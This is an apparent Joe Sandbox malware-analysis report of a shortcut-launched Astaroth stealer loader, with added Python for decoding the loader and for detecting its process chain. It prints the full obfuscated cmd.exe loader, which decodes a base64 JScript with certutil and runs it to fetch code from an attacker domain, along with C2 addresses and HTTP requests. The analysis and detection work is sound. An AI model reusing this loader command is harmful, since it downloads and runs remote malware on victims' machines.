Source: unknown | HTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Domain query: gwae8.industryinfluence.shop |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com |
Source: C:\Windows\System32\wscript.exe | Network Connect: 172.67.221.22 80 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.124.96 443 |
Source: Traffic | Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.3:49681 -> 172.67.221.22:80 |
Source: global traffic | HTTP traffic detected:
GET /cdn-cgi/error HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: www.cloudflare.com |
Source: global traffic | HTTP traffic detected:
GET /?3/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: gwae8.industryinfluence.shop
Connection: Keep-Alive |
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 104.16.124.96 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682 |
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443 |
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Wed, 01 Feb 2023 06:46:05 GMT
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: MISS
Set-Cookie: __cf_bm=HuxegvGqhPYj.RmC4Z5BvFwAUbphzy6uoWYlMjbn75I-1675233965-0-Aaaf9mQqj3uibNCAaCSZwu7+dUgj+Q0HUsqcC05pF3vk4twZOxrm6f79uC6VSOXzSChkWjNH93sJcyJueQo47SqbhV2WUSbMN6AYB2WG5yRf; path=/; expires=Wed, 01-Feb-23 07:16:05 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
Server-Timing: cf-q-config;dur=6.0000002122251e-06
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm6%2B2%2FiRNIaRnavKlgeBIJCR2OhRC7bTShI3kSlts9Bq%2F4TeHdgYWVJBiLxcPeIM1sfMbk%2FjhgDxcvV7GOQwTIwA95teLMMeDeK67IhNAo8%2BVCpBOBcm8gzNRgpFUH5GK2A%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnKVGuWQtbjLxL; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:46:05 GMT; HttpOnly
Server: cloudflare
CF-RAY: 7928ba5a6cd990ee-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 |
Source: wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://gwae8.industryinfluence.shop/?3/ |
Source: wscript.exe, 00000003.00000003.257885861.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251546620.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258534912.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251838024.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.252114824.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://gwae8.industryinfluence.shop/ |
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://gwae8.industryinfluence.shop/?3/ |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://gwae8.industryinfluence.shop/b |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/ |
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error |
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error& |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error( |
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error2.L |
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ |
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ.4 |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/~ |
Source: unknown | DNS traffic detected: queries for: gwae8.industryinfluence.shop |
Source: C:\Windows\System32\certutil.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY! |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" |
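The cmd.exe command line recorded above is the whole loader: it creates C:\QxdHVBD\, echoes a base64 blob into QxdHVBD.jS, has certutil -f -decode overwrite that file in place with the decoded bytes, and then call's it so the default script host (wscript.exe, per the next row) runs it. The Python below is an added worked example, not part of the Joe Sandbox report or the sample: it strips the caret (^) obfuscation, resolves the !XECY! delayed-expansion variable that /V enables, decodes the echoed base64, and evaluates the string concatenations in the resulting JScript to recover the argument handed to GetObject(). The command line is the one from the report; the function names are mine, and the JScript evaluator only understands the literal-plus-identifier concatenation pattern used here (it is not a JScript interpreter).

```python
import base64
import re
from typing import Dict, Optional, Tuple

# cmd.exe command line exactly as the report records it (Process created row).
CMDLINE = (
    r"C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 "
    r"&&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS"
    r"&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw=="
    r">!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!"
)


def strip_carets(cmd: str) -> str:
    """Undo cmd.exe caret escaping: '^' quotes the next character, so the
    parser sees 's^eT' as 'seT' and '-dEco^de' as '-dEcode'. Carets inside
    double quotes are literal; this loader uses no quotes, so a flat strip is fine."""
    return re.sub(r"\^(.)", r"\1", cmd)


def expand_delayed_vars(cmd: str, env: Dict[str, str]) -> str:
    """Resolve !VAR! references, which the /V switch (delayed expansion) enables."""
    return re.sub(r"!(\w+)!", lambda m: env.get(m.group(1), m.group(0)), cmd)


def eval_concat(expr: str, variables: Dict[str, str]) -> str:
    """Evaluate a JScript expression built only from "string literals" and
    identifiers joined by '+', the pattern this loader uses to hide its URL.
    Anything else is rejected rather than guessed at."""
    atom = r'(?:"[^"]*"|[A-Za-z_]\w*)'
    if not re.fullmatch(rf"\s*{atom}(?:\s*\+\s*{atom})*\s*", expr):
        raise ValueError(f"unsupported expression: {expr}")
    out = []
    for lit, ident in re.findall(r'"([^"]*)"|([A-Za-z_]\w*)', expr):
        out.append(variables[ident] if ident else lit)   # KeyError if undefined
    return "".join(out)


def recover_moniker(js: str) -> Tuple[Dict[str, str], Optional[str]]:
    """Walk the decoded JScript statement by statement, track the string
    variables it assigns, and return the argument passed to GetObject()."""
    variables: Dict[str, str] = {}
    target = None
    for stmt in js.split(";"):          # the literals here contain no ';'
        stmt = stmt.strip()
        if not stmt:
            continue
        m = re.match(r"(?:var\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", stmt)
        if m:
            variables[m.group(1)] = eval_concat(m.group(2), variables)
            continue
        m = re.match(r"GetObject\s*\((.+)\)$", stmt)
        if m:
            target = eval_concat(m.group(1), variables)
    return variables, target


def decode_loader(cmdline: str) -> dict:
    """Caret strip -> delayed-expansion vars -> echoed base64 -> JScript -> URL."""
    plain = strip_carets(cmdline)
    env = dict(re.findall(r"(?i)\bset\s+(\w+)=([^&]+)", plain))
    plain = expand_delayed_vars(plain, env)
    m = re.search(r"echo\s+([A-Za-z0-9+/=]+)>([^&\s]+)", plain)
    if not m:
        raise ValueError("no 'echo <base64>><file>' stage found")
    b64, dropped = m.group(1), m.group(2)
    # certutil -f -decode <in> <out> with in == out rewrites the dropped file
    # in place; 'call' then runs the decoded .jS through the default script host.
    js = base64.b64decode(b64).decode("ascii")
    variables, moniker = recover_moniker(js)
    url = moniker
    if moniker and moniker.lower().startswith("script:"):
        url = moniker.split(":", 1)[1]      # the script: moniker wraps a plain URL
    return {"dropped_file": dropped, "jscript": js, "variables": variables,
            "moniker": moniker, "url": url}


if __name__ == "__main__":
    r = decode_loader(CMDLINE)
    print("dropped file :", r["dropped_file"])
    print("decoded JS   :", r["jscript"])
    print("GetObject()  :", r["moniker"])
    print("fetched URL  :", r["url"])
```

The recovered URL is the same hTtP://gwae8.industryinfluence.shop/?3/ string that the memory dump rows below list for wscript.exe, and the GET /?3/ request above is that fetch. The mixed-case scheme and the split string literals are there only to defeat naive string matching; anything that hunts on command lines should strip carets and decode the echoed blob before matching, as this does.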
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 |
Source: classification engine | Classification label: mal68.evad.winLNK@6/1@2/2 |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
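The process tree the report records (LNK file -> cmd.exe -> certutil.exe -> wscript.exe) is a chain a detection engineer can score stage by stage rather than on any single command line. The Python below is an added example, not part of the report: it runs a few heuristics over process-creation events shaped like the report's rows (caret density outside quotes, /V with !VAR! references, a long base64 token echoed to a file, an inline or standalone certutil -decode whose input and output paths are identical, and a script host started by cmd.exe on a script outside C:\Windows or C:\Program Files) and requires evidence from at least two stages before calling the chain suspicious. The three malicious events are copied from the report; the fourth, a benign certutil -verify, is constructed here as a negative case, and all tag names are mine.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# cmd.exe command line exactly as the report records it for the LNK child.
LOADER_CMD = (
    r"C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 "
    r"&&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS"
    r"&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw=="
    r">!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!"
)


@dataclass
class ProcEvent:
    parent: str    # parent image, or "LNK file" as the report labels the root
    image: str     # created process image
    cmdline: str


# Three events from the report plus one constructed benign certutil call.
EVENTS = [
    ProcEvent("LNK file", r"C:\Windows\System32\cmd.exe", LOADER_CMD),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -verify C:\Users\user\cert.cer"),      # constructed, benign
]

DECODE_SWITCH = re.compile(r"(?i)(?:^|\s)[-/]+(?:decode|decodehex)\b")
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def basename(path: str) -> str:
    return path.strip('"').lower().rsplit("\\", 1)[-1]


def strip_carets(s: str) -> str:
    return re.sub(r"\^(.)", r"\1", s)


def carets_outside_quotes(cmdline: str) -> int:
    """cmd.exe only honours ^ as an escape outside double quotes, so count
    those; a quoted caret is literal and not an obfuscation signal."""
    n, quoted = 0, False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch == "^" and not quoted:
            n += 1
    return n


def analyze(ev: ProcEvent) -> List[str]:
    """Return the heuristic tags that fire for one process-creation event."""
    tags: List[str] = []
    image, parent = basename(ev.image), basename(ev.parent)
    if image == "cmd.exe":
        plain = strip_carets(ev.cmdline)        # match on what cmd actually parses
        if carets_outside_quotes(ev.cmdline) >= 2:
            tags.append("caret_obfuscation")
        if re.search(r"(?i)\s/v\b", ev.cmdline) and re.search(r"!\w+!", ev.cmdline):
            tags.append("delayed_expansion_vars")
        if re.search(r"(?i)\becho\s+[A-Za-z0-9+/=]{40,}\s*>", plain):
            tags.append("echo_base64_to_file")
        if re.search(r"(?i)\bcertutil\b", plain) and DECODE_SWITCH.search(plain):
            tags.append("inline_certutil_decode")
        if parent == "lnk file" or parent.endswith(".lnk"):
            tags.append("spawned_from_lnk")
    elif image == "certutil.exe":
        if DECODE_SWITCH.search(ev.cmdline):
            tags.append("certutil_decode")
            args = ev.cmdline.split()            # assumes no spaces in the paths
            if len(args) >= 2 and args[-1].lower() == args[-2].lower():
                tags.append("decode_in_place")   # input overwritten by its decoding
    elif image in SCRIPT_HOSTS:
        if parent == "cmd.exe":
            tags.append("script_host_from_cmd")
        m = re.search(r'"([^"]+\.(?:js|jse|vbs|vbe|wsf))"\s*$', ev.cmdline, re.I)
        script = m.group(1).lower() if m else ""
        if script and not script.startswith(TRUSTED_DIRS):
            tags.append("script_outside_trusted_dirs")
    return tags


def analyze_chain(events: List[ProcEvent]) -> Tuple[List[Tuple[str, List[str]]], bool]:
    """Tag every event, then decide on the chain: the loader pattern is cmd
    obfuscation feeding a certutil decode feeding a script host, so demand
    evidence from at least two of those three stages."""
    per_event = [(basename(ev.image), analyze(ev)) for ev in events]
    seen = {t for _, tags in per_event for t in tags}
    stages = (
        bool(seen & {"caret_obfuscation", "echo_base64_to_file", "inline_certutil_decode"}),
        "certutil_decode" in seen,
        "script_host_from_cmd" in seen,
    )
    return per_event, sum(stages) >= 2


if __name__ == "__main__":
    per_event, suspicious = analyze_chain(EVENTS)
    for image, tags in per_event:
        print(f"{image:13s} {tags}")
    print("chain suspicious:", suspicious)
```

The in-place decode check (same path as input and output) is the cheap signal here: legitimate certutil -decode use writes to a distinct output file. The caret count is deliberately taken on the raw command line, while the keyword checks run on the caret-stripped form, because that is what cmd.exe executes; matching "certutil" against the raw string would miss "cErtUtil -dEco^de".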
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer |
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@ |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |